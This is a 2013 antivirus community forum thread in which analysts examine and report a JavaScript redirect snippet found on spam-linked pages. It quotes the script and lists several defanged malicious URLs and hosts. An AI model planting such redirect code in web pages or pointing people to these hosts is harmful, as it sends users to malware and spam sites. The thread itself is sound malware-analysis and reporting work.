Author Topic: Is this JS/Redir being detected?  (Read 4209 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Is this JS/Redir being detected?
« on: January 16, 2013, 05:55:28 PM »
See: http://zulu.zscaler.com/submission/show/d2d0e1eafe344a5f4dc740e86d9c7e7a-1358354577
Detected via a file viewer was the following JS/Redir code
See code:
Code: [Select]
<  sc​ript >
10: var1=49;
11: var2=var1;
12: if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}
13: < / sc​ript >
Read on this:  http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html (link post: Posted by Conrad Longmore)
Please wait a moment ... You will be forwarded.
Internet Explorer and Mozilla Firefox compatible only
See this report: http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js

reported to virus AT avast dot com

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: Is this JS/Redir being detected?
« Reply #1 on: January 16, 2013, 06:53:16 PM »
Hi Polonus,

This technique is used with various URLs. A search on Google included:
Code: [Select]
hXtp://ukr.net
hXtp://topsearch10.com/search.php?aid=62756&q=home+jobs
hXtp://popka-super.ru
hXtp://realstarsearch.com/search.php?q=runescape+automine
hXtp://zaebiz.info
hXtp://global-advers.com/soft.php?aid=0153&d=2&product=XPA
hXtp://www.mp3sugar.com/?aff=2081
hXtp://evamendesochka.com/go.php?sid=9
hXtp://catalog--sites.info/sea
hXtp://yahhooo.info/search.php?q=ritalin&tpl=forbot

Do you see the pattern?
~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36258
Re: Is this JS/Redir being detected?
« Reply #2 on: January 16, 2013, 09:36:51 PM »
“Ah beer. The cause of and the solution to all of life’s problems.”

"Operator! Give me the number for 911!"

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Re: Is this JS/Redir being detected?
« Reply #3 on: January 16, 2013, 10:10:05 PM »
Hi !Donovan,

Reported this and the malcode pattern to virus AT avast dot com. The file viewer analysis was clear enough to detect the "If var1 Equals var2 Then Redirect!" pattern. Another one here: htxp://cs.gamegarant.by/upload.htm
Thanks for the extended analysis on WAR: http://websiteanalystsresource.wordpress.com/2013/01/16/if-var1-equals-var2-then-redirect/ (link article author !Donovan),

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Re: Is this JS/Redir being detected?
« Reply #4 on: January 17, 2013, 03:41:42 PM »
There more variants on the same theme, see comparison operators in PHP: http://www.developphp.com/view_lesson.php?v=207 (link author = Author: Adam Khoury ) and the malcode could also be combined with particular escape characters  and through malicious spacing code....

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: Is this JS/Redir being detected?
« Reply #5 on: January 17, 2013, 05:59:53 PM »
Hi Polonus,

We have a topic from 2012 which includes similar malcode: http://forum.avast.com/index.php?topic=110553.0

~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Re: Is this JS/Redir being detected?
« Reply #6 on: January 17, 2013, 09:03:39 PM »
Hi !Donovan,

Good you alerted us to that. Seems the JS/Redir variants have been with us since 2009. Those I reported in this thread appeared on  VirusWatch Archives and then I just fed the uri's to redleg's fileviewer as I later reported to virus AT avast dot com. In a NoScript protected browser JS/Redir stands out because permission is asked to go to the conditional redirect site, which of course we should not allow. The redirect is spam click related malcode...

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36258
Re: Is this JS/Redir being detected?
« Reply #7 on: January 17, 2013, 09:12:14 PM »
the URL  hhac.net/upload.htm  is now down....

“Ah beer. The cause of and the solution to all of life’s problems.”

"Operator! Give me the number for 911!"